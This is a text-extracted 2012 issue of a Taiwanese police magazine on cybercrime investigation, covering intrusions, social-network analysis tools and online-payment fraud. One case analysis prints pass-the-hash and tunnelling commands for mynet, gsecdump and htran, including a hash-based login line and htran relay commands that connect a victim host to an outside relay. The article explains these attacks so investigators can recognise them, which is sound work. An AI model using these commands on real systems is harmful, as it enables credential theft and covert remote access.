科技警網 vs - 內政部警政署刑事警察局全球資訊網中...

七不原則記在心

求職詐騙難靠近

求職面試堅持

不繳錢、不購買、

不辦卡、不簽約、

證件不離身、

不飲酒及他人提供之不明飲料、

不非法工作

MEMO

如遇詐騙求職速速撥打165反詐騙專線讓騙子老闆無所遁形！

反詐騙諮詢專線：165、110免費報案專線：0800-211-511全國消費者服務專線：1950內政部警政署刑事警察局反詐騙網站

h t t p : / / w w w . 1 6 5 . g o v . t w

電子郵件來源解析

釣魚郵件偵查方式

人際脈絡工具分析探討網路犯罪─

日本警方因應網路恐怖攻擊對策

DDoS攻擊事件處理

與國際合作之省思

一件車禍死亡案勘察的啟示

科技警網

網路犯罪VS

封面故事

49

刑事雙月刊

49 雙月刊

專業科技正義服務團隊

中華民國101年8月 http://www.cib.gov.tw

B I M O N T H L Y

內政部警政署刑事警察局

中華民國

年

月出版

8

科技警網VS網路犯罪

101

警察機關致力「防範犯罪於未然」，就如同公共醫療衛生「三級預防」的觀念，強調事前預

防重於事後的治療；而犯罪預防工作概分為機會預防、情境預防及再犯預防等三大面向，就各預

防面向訂定犯罪預防政策，降低犯罪發生，減少國家和社會成本付出，已成各國治安策略重點。

內政部警政署在各類犯罪的預防作為，包括「165反詐騙諮詢專線」、「規劃建置身分驗證系

統」、「犯罪預防宣導」、「金融機構安全維護」、「住宅防竊」、「再犯預防」等工作，均依

上述犯罪學理論找出犯罪發生之因素、機會與情境，在未發生犯罪前，以策略干預與改善，減少

犯罪發生；對已發生犯罪行為之犯罪者，則施以查訪、約制，了解動態及掌控，使其不再犯罪。

為期能達到資源整合、全民共治的理想，預防犯罪之趨勢，逐漸朝向跨部會合作、民力運用

及開發刑事司法體系以外之犯罪預防策略，刑事雙月刊第50期將以「預防犯罪之策略與展望」為

主題，規劃「165反詐騙諮詢專線─線上身分驗證系統」、「犯罪預防宣導」、「情境犯罪預防─

金融機構安全維護及住宅防竊諮詢（治安風水師）」、「保全協助犯罪預防工作」、「治安顧慮

人口再犯防制」及「出矯治機構毒品人口尿液調驗工作」等議題，探討犯罪預防策略，

諸如社區環境設計，採行適當之建築設計，鄰里守望相助，提升國民健康和守法行為、

公共教育；增強潛在犯罪者之監控；非刑事司法體系之社會福利機構之介入、轉向以及社

區處遇；再犯預防，落實治安顧慮人口查訪，以掌握動態有效預防再犯等現行預防策略與

作為、執行情形及成效等議題，預計於101年10月出刊，歡迎各界踴躍投稿。

預防犯罪之策略與展望

歡迎各界踴躍投稿[email protected]

徵文活動

據臺灣網路資訊中心（TWNIC）統計，國內上網人口已逾1,695萬，佔全國總人口

73％，其中包含犯罪者利用資通訊匯流技術進行溝通或犯罪。經分析目前網路犯罪多以

財產犯罪為主，諸如詐欺、妨害智慧財產權與妨害電腦使用（駭客入侵、病毒程式）案

件居多。

「網路犯罪」類型不外乎：一、以電腦作為犯罪之場所─指犯罪行為是在電腦上進行

或發生的，例如在電子佈告欄（BBS）上，恐嚇、誹謗或公然侮辱他人。二、以電腦作為

犯罪之客體─透過網路以電腦系統為攻擊的目標，例如電腦駭客入侵他人網路系統並散

播病毒，以毀壞或控制他人電腦系統。

基本上，除了以電腦系統為犯罪客體之犯罪外，通常犯罪者均能輕易地利用網路（電

腦）為犯罪手段或場所，所以技術上來說，不論是毒品、貪瀆、販賣偽劣藥、洗錢及其

他所有傳統犯罪（如誹謗、詐欺或恐嚇等），皆可能利用網路電腦為犯罪手段或場所來

從事。故大多數的「網路犯罪」，都僅係以利用網路為實施犯罪之手段或場所，即所謂

廣義之「網路犯罪」，與狹義之「網路犯罪」所指與電子資料處理有關之故意而違法破

壞財產法益的「財產罪」有所不同。而目前學界通採折衷說，認為「網路犯罪」乃指行

為人濫用或破壞電腦而違犯具有電腦特質（Computer Property）的犯罪行為，所謂「電

腦特質」則以行為的違犯、追訴或審判是否需要電腦的專業知識為斷。

網路犯罪與其他傳統犯罪之偵查要領略有不同，偵查網路犯罪除了必須具備偵查一

般犯罪之知識外，還必須研究網路犯罪之特性、網路犯罪者之動機、犯罪手法、電腦稽

核、網路犯罪之線索以及偵查程序、要領，為了有效打擊電腦網路犯罪，需建置電腦鑑

識（Computer Forensics）或資訊鑑識（Cyber Forensics）系統設備，負責蒐集、檢驗、

分析及保存數位證據，透過電腦採集有意義的證據資訊或從片斷資料描繪案情概略，以

重建犯罪現場資料。

面對新興之網路犯罪問題，內政部警政署已主動與相關單位密切合作，結合國內網

路服務與拍賣平臺業者共同防制網路犯罪，強化跨部會平臺運作與分工機制，透過重要

資安議題提列跨部會平臺會議研議防制策略，研訂有效管理辦法及加強各項安全管理機

制，並辦理教育訓練以提升各警察機關偵查網路犯罪專業技術能力，持續跨境合作查緝

網路犯罪，建立國內網路端完整監察機制，強化偵辦網路犯罪之能量，積極偵辦網路犯

罪案件，維護整體網路環境安全。

編︱輯︱室︱手︱札 Editor Navigat ion

科技警網VS.網路犯罪◎文／編輯室

B I M O N T H L Y

中華民國101年8月http://www.cib.gov.tw雙月刊


發行人：

林德華

副發行人：

劉柏良、楊源明、陳檡文

總編輯：

許瑞山

副總編輯：

陳譓森、許書坤

主編：

程進豊、張睿瑜

執行編輯：

黃淑華、游琇、賴伯榮、

施騰凱

發行所：


地址：臺北市忠孝東路四段

553巷5號

電話： 02-27697399轉2283、

2284

網址：www.cib.gov.tw

設計印刷：

日創社文化事業有限公司

地址：臺北市民權東路6段11

巷43-1號5樓

電話：02-7737-8585

封面題字：書畫家樓柏安先生

C O N T E N T

專題網路駭客竊取密碼與攻擊之案例剖析資訊室偵查員／陳俊呈‧Acer eDC技術協助

網路犯罪—人際脈絡工具分析探討偵查科偵查員／李維佳

線上電子金流與電子商務犯罪問題淺論預防科警務正／王鈞賦

淺談網路釣魚之犯罪手法資訊室偵查員／李慶憲

電子郵件來源解析資訊室偵查員／李慶憲

釣魚郵件偵查方式資訊室偵查員／陳俊呈‧Acer eDC技術協助

04

14

10

18

23

30

49

64

68

辦案點滴


桃園縣政府警察局刑事鑑識中心警務正／林文煜

DDoS攻擊事件處理與國際合作之省思研發室組長／莊明雄‧偵查員／楊永富

論納入基層員警為科技警網量能之必要及作為臺灣警察專科學校兼任助理教授／伍姿蓉

印尼雅加達執法合作中心（Jakarta Center for Law Enforcement Cooperation, JCLEC）參訓記事國際科警務正／岳瀛宗


國際科警務正／陳文哲

國際交流外賓參訪國際科警務正／許淑華‧鑑識科巡官／賴伯榮、施騰凱

第9屆亞裔組織犯罪暨恐怖主義會議記述及心得分享

國際科警務正／林喬源

54

36

41

48

58

論壇

心情隨筆

刑事科技園區

國際瞭望臺

刑事好夥伴

4

專︱題　　Special Topic

44

文、圖／陳俊呈（刑事局資訊室）、Acer eDC技術協助

網路駭客竊取密碼與攻擊之案例剖析

前言

近年來「電腦病毒」、「網

路攻擊」或「資訊洩露」案件不斷

增多，釣魚郵件、網站充斥網路環

境，駭客入侵電腦主機竊取機密資

料或個人資料轉售詐騙集團，以獲

取不法所得，而詐騙集團更運用此

個人資料精心設計各種詐騙情節進

行詐騙，造成詐騙案件在社會上氾

濫。最近行動上網普及，駭客更將

目標瞄準智慧型手機用戶，進行帳

號密碼竊取，以便進行後續一連串

之網路盜刷、詐騙之行為。

網路攻擊個資外洩問題嚴重2011年日本Sony公司連續發

生駭客入侵案件，該公司4月發生

有史以來最大規模的客戶個資被盜

事件，共有7千7百萬筆包括信用卡

資料在內的個資外洩，5月初Sony

又再遭遇類似攻擊，有2千5百萬

筆用戶資料被盜，6月2日Sony公

司電腦網路再度遭駭客侵入，有逾

百萬筆Sony公司的客戶個人資料

被盜。同年7月4日美國福斯新聞

網（Fox.com）也遭駭客入侵並發

布假新聞。同年7月26日韓國最大

社交網站（SK Communications）

也被駭客入侵，約3500萬筆用戶

資料外洩。同年9月19日，日本軍

工業製造商三菱重工業的數據資料

庫遭到駭客入侵，駭客透過中間網

站，讓數據中心感染到病毒，包括

太空火箭、戰車、驅逐艦等軍工產

業資料，可能已經遭到盜竊。日本

政府以國際間諜案偵查三菱重工數

據庫遭到駭客入侵案。同時，全球

最大SSL憑證發放組織VeriSign，

在2011年秋季，坦承2010年時，

該公司曾經數度遭駭客成功入侵到

企業內網，並且取得小部分電腦與

伺服器的存取權限。

電腦病毒威脅加劇

這幾年資安廠商陸續發現幾

個相當複雜精密的電腦病毒。在

2010年發現的Stuxnet蠕蟲病毒，

其攻擊目標為特定的硬體設備，

Stuxnet蠕蟲病毒可自行控制該硬

體設備，此病毒是利用之前微軟

尚未發現的4個Windows漏洞進行

零時攻擊（Zero Day Attack）。

Stuxnet蠕蟲病毒與過去不太一樣

的是其目標不再是電腦和資料，而

是尋找特定目標加以控制，並用於

監控大型工業控制系統，例如發電

廠、水壩等。

在2011年匈牙利CrySys安全

實驗室發現Duqu病毒，此病毒可

滲透系統、竊取資料。Duqu病毒

的感染媒介為微軟的Word檔案，

其運用一個之前尚未被揭露的

Windows視窗核心漏洞，此漏洞可

允許插入程式碼執行。在使用者開

攻擊者製造空間的隔絕往往是案件偵查的難點，

需透過跨境合作機制，方能深入追查。


刑事雙月刊49期中華民國101年8月 5刑事雙月刊49期中華民國101年8月 5

啟該Word檔後，惡意程式即會開

始運作，並安裝Duqu病毒程式。

駭客可命令Duqu病毒散播到其他

電腦上，Duqu病毒會藉由SMB分

享功能散布到企業內的其他電腦，

若是某些被植入Duqu病毒的電腦

未連接外部網路，無法被駭客操

縱，則Duqu病毒會配置這些未連

接網路的電腦使用檔案分享的協定

連至其他可連接外部網路的被駭電

腦，把連接外部網路的電腦當作代

理伺服器，供駭客存取這些位於安

全區域內的電腦。

在2012年5月資訊安全專家發

現目前全球最複雜的電腦病毒─火

焰（Flame），據推測Flame病毒

可能已活動至少2～5年的時間。

Flame病毒主要目的在於竊取攻擊

目標的機密資料，它是一個攻擊套

件，包含不同的攻擊模組，可展開

多種攻擊行動，駭客可以根據攻擊

目標不同，決定使用該病毒的哪

些功能。Flame病毒可收集資料檔

案、遠端變更電腦設定，甚至開啟

電腦麥克風錄製語音對話和聲音、

擷取螢幕畫面和記錄即時通訊內容

等，其被積極地當做網路武器，攻

擊數個國家境內的重要機構。

6


6

實際案例剖析

本案例探討駭客如何以工具

竊取Windows系統密碼之Hash

值，並藉此得到系統管理者密碼，

此手法最嚴重將導致單位內密碼全

部洩漏，此攻擊手法目前仍被廣泛

使用中。透過對實際案例的瞭解，

可強化網路犯罪案件現場偵查之能

力與敏感度。

問題原因分析

駭客利用社交工程或是其

他方式植入木馬程式於User主機

（如圖1中電腦A），同時藉由後

門登入系統並取得Domain User

（本案例以tony為例）的帳戶權

限。若是tony具有administrators

Group的權限，則駭客可藉由抓

取Hash值的駭客程式（GetHash

或gsecdump）取得本機上所有

帳戶的密碼Hash值，包括Local

Administrator。

駭客取得Local Administrator

的密碼Hash值（本例以H1，H2表

示）。

取得Hash值後，根據目標主

機Local Administrator密碼設定情

形，有以下3種連線結果：

● 若該網段其他主機的 L o c a l

Administrator帳號、密碼皆相

同時（密碼Hash值同樣是H1，

H2），則駭客可藉由駭客程式

mynet，直接利用取得的密碼

Hash值來登入其他主機（如電

腦B），而不需要破解密碼。

● 駭客也可以利用Rainbow Table

或其他暴力破解工具，破解

Hash並取得密碼後，再以Local

Administrator帳號登入其他主

機。

● 若該單位每臺主機的 L o c a l

Administrator密碼皆不相同，則

駭客無法登入。

1. 駭客利用社交工程植入木馬、後門並取得Domain User（tony）的帳戶權限

Role ID GroupLocal Administrator Administrator AdministratorDomain User tony AdministratorGuest Guest Guest

ID LM-Hash NT-Hashadministrator H1 H2 tony H3 H4 guest H5 H6

ID LM-Hash NT-Hashadministrator H1 H2 john H7 H8 guest H9 H10

ID LM-Hash NT-Hashadministrator H11 H12 ken H13 H14 guest H15 H16

ID LM-Hash NT-Hashadministrator H1 H2 john H7 H8 guest H9 H10

2.由於 tony具有administrators G r o u p的身份，因此利用GetHash可以取得本機所有帳戶的密碼Hash值

屬於同一Group

電腦A

電腦B 電腦C 電腦D

3. 取得Local Administrator的密碼Hash值（H1、H2）

4.3 反之，若Local Administrator密碼不同，則駭客無法由以上方式進行登入

4.2 駭客也可利用Rainbow Table或其他暴力破解方式，破解Hash值取得密碼

4.1 當其它主機上Local Administrator的密碼皆相同時，可經由駭客程式mynet輕易登入系統，而不需破解密碼

圖1　駭客入侵竊取帳號／密碼流程示意圖


刑事雙月刊49期中華民國101年8月 7

微軟視窗系統密碼儲存方式

首先探討Windows密碼儲存

方式，Windows系統為了保持對

舊有系統的相容性，在Windows

Vista和Windows Server 2008之前

的作業系統，使用者密碼預設同時

以LM-Hash和NT-Hash兩種編碼方

式來儲存。（如圖2）

LM-Hash為微軟所使用的舊式

編碼方式，編碼時無區分密碼大小

寫，僅支援142種字串符號，整體

密碼長度最長只有14字元，且加密

方式為DES（可逆演算法），其編

碼所使用的Key長度只有56 bit，等

於只要嘗試猜測256種組合即可破

解，對現今電腦等級來說，長度太

短，安全性較低。

NT-Hash（NTLM-Hash），

微軟為了提高安全性，在Windows

NT 3.1時加入了NT-Hash編碼，相

較於LM-Hash，密碼會區分大小

寫，並支援65,535種字串符號，

整體密碼長度增加為127字元，且

加密方式採用MD4（不可逆演算

法），安全性較高。

駭客竊取密碼手法說明

駭客藉由系統漏洞，建立一

個具有admin權限的帳戶，上傳

Hash Dump程式（如GetHashes、

Pwdump_7）取得系統所有使用者

密碼的Hash值。（如圖3）

駭客將取得的Hash值，利用

破解工具來取得系統admin的密

碼。以密碼a1234為例，利用工具

僅需要32秒即可破解。（如圖4）

取得密碼後，駭客即可以合

法帳戶登入系統，同時為了躲避系

統管理者的檢查，駭客會刪除新建

立的帳戶。

駭客程式介紹

目前網路上流傳不少駭客常

用的程式，所謂駭客程式就是駭客

可運用這些程式來進行網路掃描、

蒐集帳號／密碼、滲透入侵、掩飾

行蹤、操控受害電腦等動作，以下

就介紹本文案例所運用之駭客程

式。

● mynet

特色─利用Net use的方式，

可以直接利用取得的密碼Hash值

登入網段內其它主機，而不需破解

密碼。指令參數─見圖5所示。

administrator:500:C23413A6A1E7665FAAD3B435B51404EE:7FB4D2F84C16139D7D0A97E7F753C02E

帳號名稱：RID:LM-Hash:NT-Hash

圖2　Windows密碼儲存格式範例

圖3　利用駭客程式gh.exe（GetHashes）來抓取密碼的Hash值

密碼Hash值

mynet use <remote_share_name><user_name><LM_HASH:NT_HASH>

欲登入的目標主機帳號

圖5　mynet指令參數

圖4　密碼Hash值破解工具畫面


8

專︱題　　Special Topic專︱題　　Special Topic

8

執行畫面─該程式檔名不固

定，以下真實案例的檔名為myt.

exe。（如圖6）

● htran.exe

特色─利用 s o c k e t 5穿透

Firewall，連線到指定的外部IP和

Port，並建立Tunnel。運作原理─

如圖7所示。

● gsecdump.exe

特色─ g s e c d u m p . e x e較

GetHash程式能力更強，只要擁

有administrator的權限，便可直

接Dump出AD上所有帳號的Hash

值。

指令參數─只要在AD上執行

gsecdump-a就可以抓出所有的帳

號與Hash值，如圖8。

此案例攻擊手法總結

駭客利用此攻擊手法取得所

有密碼的Hash值，並結合密碼破

解工具後即可算出密碼內容，也可

利用Hash值工具直接登入其它主

C:\myt.exe use \ \ icmis2008 msl inaad3b435b51404eeaad3b435b51404ee:791a7be96c800d7252ed8705750e2e26IpShel lCode006Addr==0x77c40300IpShel lCode007Addr==0x77c40330IpSyetemFunct ion006==0x77dc5387IpSyetemFunct ion007==0x77dc5387SystemFunct ion006latAddr==0X77c4108cSystemFunct ion007latAddr==0X77c41090[SystemFunct ion006latAddr]==0x77dc5387[SystemFunct ion007latAddr]==0x77dc52aeEXECUTE CMD:net use “ \ \ icmis2008 “ aaaaaaaaaaaa /user:msl in

命令執行成功。

圖6　駭客程式mynet.exe執行畫面

步驟一

步驟二

步驟三

受害主機中繼站駭客主機



在受害主機上安裝socket5服務，並啟動htran.exe，預設開啟8009 Porthtran.exe –install//安裝socket5服務htran –strart //啟動

連結中繼站119 Porthtran –p –slave 中繼站IP119.127.0.0.1 8009

8009 Pprt 119 Pprt 120 Pprt Any Pprt

使用socketscap連結中繼站120 Port

在受害主機和駭客主機之間便建立一直接連線的Tunnel

在中繼站上執行htran，並任意監聽兩個Porthtran –P –listen 199 120//監聽199、120 Port

圖7　駭客程式htran.exe運作原理


機；此攻擊方式較傳統運用sniffer

程式之方式需額外放置監聽程式與

耗費時間等待來說，更為快速與有

效率，防範上也難以偵測。

目前網路偵查常遭遇之瓶頸

─跳板與中繼站

在進行網路犯罪之偵查過程

中，首先多由受害者主機進行採

樣鑑識，以確認攻擊來源之 IP或

URL，之後再進一步根據發現之攻

擊IP或URL進行追查，往往能發現

攻擊IP或URL為跳板或中繼站，且

多位於國外。攻擊者製造空間的隔

絕造成追查斷點，故為求案件偵查

效率，可先將發現之攻擊IP或URL

與目前國家資通安全會報技術服務

中心已發現之中繼站清單進行比

對，以確認有效之偵查來源。

結語

目前警察機關偵辦網路犯罪

上主要遭遇的困難點為網路攻擊

的犯罪者的IP或URL來源多位於國

外，針對涉及跨境犯罪問題時，須

透過跨境合作機制，與各國執法機

關進行情資交換、案件協查與共同

偵辦，方能深入追查犯罪人之地

點。

圖8　駭客程式gsecdump.exe相關執行參數


10


若能多利用如Facebook Visualizer等軟體工具整合情資，必能減少人員消耗，提

升辦案效率。

網路犯罪─人際脈絡工具分析探討文、圖／李維佳（刑事局偵查科）



前言

隨著時代潮流的變遷及科技

的日新月異，警方在刑案偵辦過程

中，每個重要案件與網際網路之間

已形成了一個密不可分的網絡關

係，是以如何快速地進行網路資料

分析且有效率地從中抽絲剝繭出彼

此間的關聯，以達到在有限時效內

儘速偵破案件之目的，已成為一門

相當重要的課題。

而網路犯罪偵查於1997年發

展至今，因為網路偵辦技巧門檻較

高，加上網路無國界、隱匿等特

性，考驗著偵查人員的眼力與腦

力，因上述種種因素環環相扣，造

成網路犯罪偵辦上的困難與挑戰。

有鑒於犯罪集團以其成員從事犯罪

活動，大多具有集團性、常習性之

組織脈絡，因此如何透過網路找出

其關聯性，最終查出嫌犯的真實身

分，即為未來輔助警方辦案的重要

工具，而當前熱門的網路社群網站

便是最好的平臺。

網路犯罪現況探討

近年來隨著臺灣網路發展迅

速與電腦普及使用，迄2011年為

止，臺灣上網人口已佔總人口數

約73％比例，而隨著網路高度發

展，隨之而來的便是網路犯罪發生

數每年均維持在一定的件數之上，

且有朝集團化、專業化之趨勢發

展。

隨著科技日益進步及網路蓬

勃發展，現今大部份的犯罪型態，

其犯罪過程諸如嫌犯與嫌犯及嫌犯

與被害人間的聯絡、洗錢管道及個

資取得等，或多或少都與網路有所

關聯。一般來說偵查人員在網路案

件偵辦方向，大部份利用調閱目

標資料（ID、IP、Login Time等）

以取得可用資訊（ISP、網咖、歷

史刑事案件記錄等），並透過網路

上所提供之免費服務（TWNIC 、

WHOIS等）進行資料來源分析，

如2005年臺灣惡龍張○銘,即因網

路線上遊戲「天堂」，而遭偵查人

員利用IP位置找出其所在地，進而

直搗賊窟、攻堅成功，但隨著犯罪

手法演變與進化，現今已無法再像

早期偵辦網路犯罪時，單憑一個IP

位址即可循線查獲犯嫌。

近年臺灣網路犯罪發生概況圖


12

專︱題　　Special Topic專︱題　　Special Topic

六度分隔理論介紹

六度分隔／六度分離（S i x

Degrees of Separation）理論，

係1967年哈佛大學心理學教授

斯坦利．米爾格蘭姆（Stan ley

Milgram）提出的理論，其主要是

描繪出一個人際連繫網，而任何兩

位素不相識的人之間，通過一定的

聯繫方式，總能夠產生必然聯繫或

關係。米爾格蘭姆經由連鎖信的實

驗發現，寄發的這些郵件包裹最多

不會經過5個人轉手，即可順利地

交付到目標的手上，從而得出「六

度分隔理論」。由此可知，我們與

陌生人之間的距離，並非想像中的

遙遠，簡單地說，實驗結果表示出

在生活當中任一人和任何一個陌生

人之間所關聯的人不會超出6個，

也就是說，最多通過6個人你就能

夠認識任何一個陌生人。

儘管網路犯罪無法預測，但

是犯罪模式卻有痕跡可循，經由上

網通訊可顯示出一個人的生活模

式，雖然每次刑案犯罪的模式不盡

相同，但卻可以透過收集所有的

犯罪資料進行系統化，建立案件模

型，作為參考指南。對偵查人員來

說，如能利用社群網路平臺，導入

大量犯罪資料，並透過上述理論針

對社群網路進行分析，即能節省大

半時間，把更多時間拿來拓展偵辦

方向或更深入的分析。而透過前述

理論可從廣度與深度兩方面對犯罪

案件進行分析：

● 廣度（橫向）：一般未受過專門

訓練的人，大腦對於數字及筆

數，有記憶上的瓶頸及限制。透

過資料庫的數據管理，可以視覺

化的方式呈現在眼前。

● 深度（縱向）：專案進行期間如

果沒有特定對象，往往是大海撈

針，資料大量調閱，如不能系統

化處理，容易顧此失彼，有所遺

漏。藉由視覺化系統科技，可將

所有資料逐一過濾、分析與比

對，不但可免去大量的人力與時

間，更能進行深一層的資料比

對。

分析系統介紹

本文介紹一款名為

「Facebook Visualizer」之軟體

程式，此軟體能透過程式整合技

術，將目前社群網路中目標帳號於

12

六度分隔理論應用於Facebook

Facebook Visualizer


Facebook裡的好友關聯建立成一

視覺圖表，利用此圖能找出彼此的

朋友或潛在朋友，對於集團性犯罪

能提供第一線偵查人員最有利的偵

辦工具，不僅縮短辦案時程，更能

精確掌握犯罪資訊，順利緝捕嫌

犯。此外，因為Facebook較其他

一般社群網路的差異性在於大部分

的用戶皆是使用實際名稱，所以，

對於偵辦人員來說即能較易找到真

正隱藏於網路背後的身分。惟考量

隱私權等相關法律問題，目前此軟

體只針對執法人員才能使用，以避

免被其他不肖人士濫用。

此軟體的功能性分析如下：

● 分析目標關聯：在很多時候偵

查人員並不知道目標本身關係

或彼此的關聯，此外面臨到的

是超過負荷的大量資料，並且

需從中找出最有用的實體和連

接關係。故在實際操作過程

中，則可利用此軟體協助並將

這些資訊以

清晰的形式呈現。

● 有限的可用資訊：目標網

路關係通常是不斷變化的，因

此偵查人員需要可協助其快速

找出潛在關鍵個人或團體的工

具，以便將資訊更有效地聚焦

在重要對象上。

● 找出交集的連接關係：在人際

網絡中並非所有的連接關係都

同等重要或有相同的影響力，

因此偵查人員需要圖形化實體

間關係的方式，以找出這些交

集連結在人際網絡關係上的影

響程度。

結論

因應科技的快速變遷，人們

日常生活的方式與環境較之前已大

不相同，人際網絡分析同時提供

了複雜人類交往的視覺與數理分

析，這種分析方法具有實質上的重

要性，因為此工具本身結合了資料

萃取、處理和分析，加上視覺化工

具，可由龐大的資料庫中淬煉出不

尋常的聯繫，並以視覺化圖形來顯

示之。

此外現今生活中，人們已與

網路、手機、電腦等密不可分，它

們彼此之間緊緊相依，因此我們期

望藉由此系統應用在案件偵辦上只

是一個開端，未來如能搭配運用其

他資訊整合（如通聯等）系統，將

能達到減輕偵辦資源浪費及降低人

力時間成本之目標，有效提昇辦案

效率，讓偵辦人員在打擊網路犯罪

上能夠無往不利。

14


14

虛擬交易時，買賣雙方常常容易因一

時不注意而致權益受損，甚至遭到詐

騙，需公正單位介入管理。

文、圖／王鈞賦（刑事局預防科）

線上電子金流與電子商務犯罪問題淺論



隨著社會的進步與發展，國

內民眾生活水準日益提升，而伴隨

而來的社會問題，一直以來都與世

界各國在追求經濟發展上息息相

關，然而所衍生而來的犯罪問題，

實在為政府不得不重視之議題。究

其原因，電子商務在買、賣雙方彼

此未曾謀面之下，進行商品、金錢

之往來交易，事實上係建立在誠信

原則的基礎上，買方信任賣方未

來可以依約履行，而賣方希望可

以順利收到款項。如果有任何一

方背棄了誠信原則，那麼就有可能

成為交易糾紛，甚至為詐騙案件。

目前國內民眾最常使用的電子商務

大致為網路購物、網路拍賣等，為

了不讓任何一方遭受損失，如何確

保買賣雙方的權益，一向是業者以

及消費者相當重視的議題，但是在

缺乏公正單位的介入，消費者常常

容易因一時不注意而致權益受損，

而在網路拍賣中，消費者有時難以

確認賣方身分，而且對商品實體也

不能親自檢視，遭詐騙之情況時有

所聞。

電子金流與支付

目前在電子商務之金錢支付

部分，如果能夠導入一個金融緩衝

區的概念，由一個有足夠能力、具

公信力且受到相關法令嚴格管制的

第三方機構，能對交易雙方的金流

基於雙方同意之下，有條件地予以

媒合，應該有機會可以減少交易糾

紛與詐騙問題。比較現行的電子金

流，第三方支付方法

應是目前來說最接近

此概念的實行方式。

而其實國外已出現

相當成熟的第三方

支付方法（如中國

的支付寶、美國的

paypal），有利於保障買、賣雙

方，且具有覆約保證的功能，反觀

國內目前第三方支付仍屬起步階

段，尚未具一定程度上的規模。

第三方支付方法能夠廣泛

地適用於網路上之電子商務，包

含網路購物（B2C）、網路拍賣

（C2C）等類型，在國內全面推行

之前，還是需要有相關的法律與管

理配套措施為前提。

網路詐騙問題

有關目前網路詐騙常發生

之手法，大致為網路（拍賣）購

物詐騙、網路詐騙結合電話詐騙

等複合式手法。有別於網路購物

（B2C），一般國內常見的網路

（拍賣）購物之電子商務多屬於無

店面零售業，須配合相關的物流

商、供應商，也因此必須承受一定

程度的資安風險。而據警方接獲報

案資料顯示，交易資料外洩是目前

網路詐騙的主要原因。

依國內網路拍賣詐騙的手

法，大致可分為假網購真詐財、真

網購真詐財。假網購真詐財指的是

被害人其實並未在網路平臺上進行

過該筆交易，而歹徒卻以之前被害

人曾經交易過的資料取信於被害

人，而導致被害人不察，因此而


16


遭受詐騙損失。真網購真詐財是指

被害人在網路平臺上實質進行交易

後，無法獲得約定之商品，因而遭

受詐騙損失。

就目前新興詐欺犯罪案例，

我們發現跨兩岸經營網拍詐欺集團

之不法分子，由大陸共犯向駭客購

買大量評價高之雅虎奇摩拍賣及

露天拍賣帳號進行盜用。駭客以

散佈電腦木馬等方式入侵他人電腦

等方式作為跳版，形成殭屍網路

（Botnet），再由遠端連結登入遭

入侵電腦。詐欺集團成員再利用遭

入侵電腦所用之IP位址進行刊登拍

賣商品及聯絡電話等資訊，由在臺

共犯，將聯絡電話設定轉接至大陸

電話門號，誘騙不知情網拍買家撥

打上述電話轉接至佯稱賣家之詐

騙集團大陸共犯進而匯款，復由在

臺共犯車手進行提領，大陸共犯再

以誆稱貨物已寄出等騙術，以延長

詐騙帳戶存活時間，避免遭警方警

示；而詐騙帳戶之取得管道，通常

由在臺共犯另在報紙及網路刊登求

職廣告，並設立假應徵詐騙機房，

由假冒面試專員之在臺共犯，分別

以馬夫、司機、公關等名義，要求

不知情之應徵者交付銀行帳戶提款

卡，做為詐騙帳戶之來源。

電子金流模式─第三方支付

網路購物、拍賣交易中如何

確保交易安全，目前國內仍以貨到

付款、面交付款為公認較安全之方

式。如果考量方便性與效率，第三

方支付服務是目前較能提供交易公

正性與擔保之方式，較著名之第三

方支付服務如美國之PayPal及大陸

之支付寶，均為網路交易帶來高效

率與高可信賴之效益。雖然國內目

前對於第三方支付未有明確法律規

範，未來應使網路金流能獲得銀行

保證，建立一個金流緩衝區，例如

可結合實體或網路ATM做為交易存

轉的工具，並納入網路指定付款專

戶，配合驗證工具確認收貨。對於

獨立經營金流服務、電子商務平臺

兼營金流服務等方式，如能訂定執

照取得、風險控管等相關要素，建

立更為安全及公平之網路交易環境

將指日可待。不過第三方支付雖能

促進電子商務，但對於資金之監

管、匯兌、匿名性、反洗錢議題仍

亦有其風險因素在，對此也是國內

仍不敢冒然驟進之主因。

PayPal（www.p aypal.com）

成立於1998年12月，是最早成立

的第三方支付方式之一，它使用電

子郵件來作為使用者間轉移資金時

之身分識別，而取代了傳統的支票

或匯款方式，亦無需透露金融財務

資料給對方，因此提供了保護隱私

的功能。2002年當時全球最大的

拍賣網站eBay（www.ebay.com）

收購了PayPal後，PayPal 就成為

了eBay最主要的支付方式，而藉

著PayPal在全球190個國家間支援

24種貨幣支付，eBay也成為全球

性、跨國際的拍賣網站。近年來

中國電子商務市場的快速發展，

也與第三方支付業務發展有關。

中國的阿里巴巴於2003年成立線

上拍賣網站淘寶網（www.taobao.

com），2004年成立第三方支付

服務「支付寶」，提供第三方擔保

交易模式，由買家將貨款轉入支付

寶帳戶後，由支付寶向賣家通知已

付款訊息，賣家據此以出貨。俟買

家收到商品確認後，再於支付寶內

確定將貨款轉入賣家，而完成交

易。

從法制面來看，我國對第三

方支付之業務，仍採行較為保守之

政策，金管會為此曾修訂信用卡管

理辦法第27條第1項第7款規定：

「收單機構所簽訂之特約商店如係

使用網際網路交易平臺進行信用卡

交易者（時），收單機構應與提供

16



網際網路交易平臺服務業者簽訂契

約。」同辦法第8款規定：「收單

機構應撥付予特約商店之款項，不

得直接撥付予第三人。但網際網路

交易平臺服務業者就使用該平臺接

受信用卡交易之特約商店，如該信

用卡交易金額已取得銀行十足之履

約保證或全部交付信託，並經收單

機構審核屬實者，收單機構得依特

約商店指示將款項撥付予網際網路

交易平臺服務業者。」是以，我

國雖無針對第三方支付服務訂定

專法，但國內有意辦理第三方支

付服務之業者（如Yahoo輕鬆付、

PayNow等），仍可依信用卡管理

辦法第27條規定，與銀行簽約取得

履約保證，將款項撥付予網路平臺

服務業者。

電子金流面臨之問題

如經營第三方支付之業者並

非銀行體系，其沈澱資金其實具有

不小的風險性問題。由於第三方支

付機構所保管之資金並非其本身所

持有，很多都可以直接支配其交易

間產生之資金流，銀行沒有辦法針

對第三方支付機構大量的交易紀錄

進行比對，也無約束力，若第三方

支付機構將資金挪用，此點很容易

造成流動性風險。此外，在網路電

子商務行為中，使用者匿名性是一

大特色之一，如果使用者依匿名的

電子郵件帳號，設置第三方支付帳

號，之後利用網路銀行將資金移轉

至第三方支付平臺，完成在網路上

的交易，而此時銀行並不知道資金

的來去動態，僅得知第三方支付機

構表面上的帳目訊息，而使得追蹤

帳戶成了一大困難，而具備跨國

支付的交易，更大幅提供了不法歹

徒、恐怖分子的洗錢管道，此外也

增加了不法炒匯的方法，在外匯管

制的門禁外另闢了一個捷徑。由於

第三方支付平臺的匿名性及便利

性，也增加了信用卡套利的問題，

如在免費的第三方支付平臺，透過

